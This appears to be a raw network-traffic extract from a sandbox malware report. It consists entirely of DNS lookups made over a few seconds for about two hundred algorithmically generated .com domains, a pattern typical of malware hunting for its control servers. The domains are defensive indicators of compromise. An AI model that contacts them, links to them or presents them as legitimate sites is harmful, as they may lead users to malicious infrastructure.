                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404473066 CET192.168.2.81.1.1.10xce15Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404613018 CET192.168.2.81.1.1.10x5e94Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404822111 CET192.168.2.81.1.1.10x22ddStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.406682968 CET192.168.2.81.1.1.10x6689Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.408971071 CET192.168.2.81.1.1.10x857fStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.411432028 CET192.168.2.81.1.1.10x9cf7Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.431459904 CET192.168.2.81.1.1.10xf57dStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.433712959 CET192.168.2.81.1.1.10x201eStandard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.433895111 CET192.168.2.81.1.1.10x85Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434091091 CET192.168.2.81.1.1.10x2dd5Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434233904 CET192.168.2.81.1.1.10x73feStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434511900 CET192.168.2.81.1.1.10x9ed8Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434776068 CET192.168.2.81.1.1.10xb648Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434776068 CET192.168.2.81.1.1.10x286bStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434937954 CET192.168.2.81.1.1.10xe1cfStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435101986 CET192.168.2.81.1.1.10xcc6fStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435477018 CET192.168.2.81.1.1.10xd92cStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435838938 CET192.168.2.81.1.1.10x4d11Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436151028 CET192.168.2.81.1.1.10x46a4Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436335087 CET192.168.2.81.1.1.10xf707Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436502934 CET192.168.2.81.1.1.10x6a76Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437369108 CET192.168.2.81.1.1.10xd9baStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437752962 CET192.168.2.81.1.1.10xd28aStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437869072 CET192.168.2.81.1.1.10xef35Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.440907955 CET192.168.2.81.1.1.10xf4dStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441086054 CET192.168.2.81.1.1.10xcf34Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441355944 CET192.168.2.81.1.1.10x9d6cStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441723108 CET192.168.2.81.1.1.10x3647Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441812038 CET192.168.2.81.1.1.10xdc1cStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.914248943 CET192.168.2.81.1.1.10x7966Standard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.519001961 CET192.168.2.81.1.1.10xdc1cStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.435937881 CET192.168.2.81.1.1.10x516cStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.444015026 CET192.168.2.81.1.1.10x2405Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.444602013 CET192.168.2.81.1.1.10xd95cStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.445938110 CET192.168.2.81.1.1.10xace2Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.447357893 CET192.168.2.81.1.1.10x4b62Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.451500893 CET192.168.2.81.1.1.10x484bStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.453526020 CET192.168.2.81.1.1.10x4f61Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.454638958 CET192.168.2.81.1.1.10x6bfbStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.457443953 CET192.168.2.81.1.1.10xfe58Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.458601952 CET192.168.2.81.1.1.10x2d9aStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.519344091 CET192.168.2.81.1.1.10xeb9cStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.520976067 CET192.168.2.81.1.1.10xa6c5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.521415949 CET192.168.2.81.1.1.10x1064Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.525688887 CET192.168.2.81.1.1.10xc023Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.535356045 CET192.168.2.81.1.1.10x4c09Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.536586046 CET192.168.2.81.1.1.10x4e16Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.545945883 CET192.168.2.81.1.1.10x2580Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.550546885 CET192.168.2.81.1.1.10xec8bStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.551522017 CET192.168.2.81.1.1.10x2a79Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.556700945 CET192.168.2.81.1.1.10x93c0Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.568180084 CET192.168.2.81.1.1.10xd09eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.570851088 CET192.168.2.81.1.1.10x3557Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.572446108 CET192.168.2.81.1.1.10xcdb8Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.582787037 CET192.168.2.81.1.1.10x87fStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.590773106 CET192.168.2.81.1.1.10xe4feStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.590930939 CET192.168.2.81.1.1.10x3802Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591063023 CET192.168.2.81.1.1.10xbfa8Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591120958 CET192.168.2.81.1.1.10x8ed3Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591308117 CET192.168.2.81.1.1.10xa610Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591455936 CET192.168.2.81.1.1.10xec20Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591589928 CET192.168.2.81.1.1.10x35caStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.591643095 CET192.168.2.81.1.1.10x4986Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.595145941 CET192.168.2.81.1.1.10x9b2eStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.596065044 CET192.168.2.81.1.1.10xbbaaStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.596993923 CET192.168.2.81.1.1.10x5acStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.597956896 CET192.168.2.81.1.1.10x5676Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598071098 CET192.168.2.81.1.1.10xadbStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598217010 CET192.168.2.81.1.1.10xfc4eStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598464012 CET192.168.2.81.1.1.10x63f2Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.598984003 CET192.168.2.81.1.1.10x641Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.600120068 CET192.168.2.81.1.1.10x8be0Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.601278067 CET192.168.2.81.1.1.10x551aStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.601484060 CET192.168.2.81.1.1.10x2dd0Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.602230072 CET192.168.2.81.1.1.10x4808Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.610717058 CET192.168.2.81.1.1.10x240cStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.638166904 CET192.168.2.81.1.1.10xe2faStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.640847921 CET192.168.2.81.1.1.10xc966Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641021013 CET192.168.2.81.1.1.10x400eStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641288996 CET192.168.2.81.1.1.10xfb52Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641522884 CET192.168.2.81.1.1.10x63dfStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641550064 CET192.168.2.81.1.1.10xcc45Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641673088 CET192.168.2.81.1.1.10x1bddStandard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.641942024 CET192.168.2.81.1.1.10x5f29Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.642230988 CET192.168.2.81.1.1.10xb388Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.642323017 CET192.168.2.81.1.1.10x97b4Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.645664930 CET192.168.2.81.1.1.10x642Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.656476021 CET192.168.2.81.1.1.10xa484Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.657857895 CET192.168.2.81.1.1.10xdd55Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.706362009 CET192.168.2.81.1.1.10x1a20Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.706362009 CET192.168.2.81.1.1.10x5b72Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.708108902 CET192.168.2.81.1.1.10x5fc5Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.715821028 CET192.168.2.81.1.1.10x2346Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723193884 CET192.168.2.81.1.1.10xf90Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:12.723289013 CET192.168.2.81.1.1.10x7150Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.079829931 CET192.168.2.81.1.1.10x364fStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.082798004 CET192.168.2.81.1.1.10xbb43Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.095782995 CET192.168.2.81.1.1.10x7694Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.096477032 CET192.168.2.81.1.1.10x2b71Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.096643925 CET192.168.2.81.1.1.10x89e9Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.099136114 CET192.168.2.81.1.1.10x6f76Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.099944115 CET192.168.2.81.1.1.10x7660Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.106781006 CET192.168.2.81.1.1.10xc25eStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.107105017 CET192.168.2.81.1.1.10xebedStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.112060070 CET192.168.2.81.1.1.10x441bStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.113161087 CET192.168.2.81.1.1.10xd504Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.114820957 CET192.168.2.81.1.1.10x6522Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115004063 CET192.168.2.81.1.1.10xd6b7Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115205050 CET192.168.2.81.1.1.10x6d09Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115684032 CET192.168.2.81.1.1.10x3c7eStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115828991 CET192.168.2.81.1.1.10x5cadStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.116328955 CET192.168.2.81.1.1.10x3c46Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.116970062 CET192.168.2.81.1.1.10x2acaStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.122123957 CET192.168.2.81.1.1.10x3fe1Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.122594118 CET192.168.2.81.1.1.10x38eeStandard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147203922 CET192.168.2.81.1.1.10x2d48Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147387981 CET192.168.2.81.1.1.10x8b86Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147559881 CET192.168.2.81.1.1.10xb02Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.147707939 CET192.168.2.81.1.1.10x5d6dStandard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.148459911 CET192.168.2.81.1.1.10x2cefStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149029970 CET192.168.2.81.1.1.10x54e1Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149197102 CET192.168.2.81.1.1.10x33f4Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149348974 CET192.168.2.81.1.1.10xd017Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149523973 CET192.168.2.81.1.1.10x3a40Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149568081 CET192.168.2.81.1.1.10xd61dStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.149735928 CET192.168.2.81.1.1.10x34efStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.150752068 CET192.168.2.81.1.1.10x8522Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.150953054 CET192.168.2.81.1.1.10x5a35Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.151010990 CET192.168.2.81.1.1.10xf0cbStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.151150942 CET192.168.2.81.1.1.10xe832Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.151810884 CET192.168.2.81.1.1.10xb83bStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.151969910 CET192.168.2.81.1.1.10x5a0eStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.152122974 CET192.168.2.81.1.1.10xa134Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.152281046 CET192.168.2.81.1.1.10x8160Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.152431965 CET192.168.2.81.1.1.10xf33bStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.152662039 CET192.168.2.81.1.1.10x1fedStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.152801037 CET192.168.2.81.1.1.10xa9ccStandard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.153594971 CET192.168.2.81.1.1.10x66baStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.153652906 CET192.168.2.81.1.1.10x1373Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.158442020 CET192.168.2.81.1.1.10xed32Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.158623934 CET192.168.2.81.1.1.10xd15aStandard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159147024 CET192.168.2.81.1.1.10x4dc1Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159324884 CET192.168.2.81.1.1.10xaaf9Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159324884 CET192.168.2.81.1.1.10x475fStandard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159554958 CET192.168.2.81.1.1.10x51e9Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159771919 CET192.168.2.81.1.1.10x3225Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.159795046 CET192.168.2.81.1.1.10xf03aStandard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.161123037 CET192.168.2.81.1.1.10x5386Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.162008047 CET192.168.2.81.1.1.10x450aStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.162197113 CET192.168.2.81.1.1.10x6e10Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.162646055 CET192.168.2.81.1.1.10x4348Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.163068056 CET192.168.2.81.1.1.10x94d5Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.166486979 CET192.168.2.81.1.1.10x4491Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.184777021 CET192.168.2.81.1.1.10xf318Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.184832096 CET192.168.2.81.1.1.10x97bcStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.187693119 CET192.168.2.81.1.1.10xd006Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.188003063 CET192.168.2.81.1.1.10x13b2Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.188791990 CET192.168.2.81.1.1.10xb544Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.188972950 CET192.168.2.81.1.1.10x3f6dStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.064372063 CET192.168.2.81.1.1.10x45caStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:20.065582037 CET192.168.2.81.1.1.10x6abfStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.215781927 CET192.168.2.81.1.1.10xd332Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.216234922 CET192.168.2.81.1.1.10xa550Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.217698097 CET192.168.2.81.1.1.10x8aa1Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.218267918 CET192.168.2.81.1.1.10x47e4Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.228935957 CET192.168.2.81.1.1.10x5eb4Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.235105991 CET192.168.2.81.1.1.10xae99Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.236109018 CET192.168.2.81.1.1.10xadd7Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.246545076 CET192.168.2.81.1.1.10x13a2Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.257122040 CET192.168.2.81.1.1.10xcf0bStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.257318974 CET192.168.2.81.1.1.10xb9cbStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.259512901 CET192.168.2.81.1.1.10xddcdStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.259788036 CET192.168.2.81.1.1.10x79ecStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.260150909 CET192.168.2.81.1.1.10x82f6Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.262526989 CET192.168.2.81.1.1.10x2639Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.262655020 CET192.168.2.81.1.1.10xf871Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.263964891 CET192.168.2.81.1.1.10x1183Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.264415979 CET192.168.2.81.1.1.10x1195Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.264735937 CET192.168.2.81.1.1.10x57dStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.268908024 CET192.168.2.81.1.1.10xee36Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.274727106 CET192.168.2.81.1.1.10xd1bdStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.293905973 CET192.168.2.81.1.1.10xade6Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.297543049 CET192.168.2.81.1.1.10x72a4Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
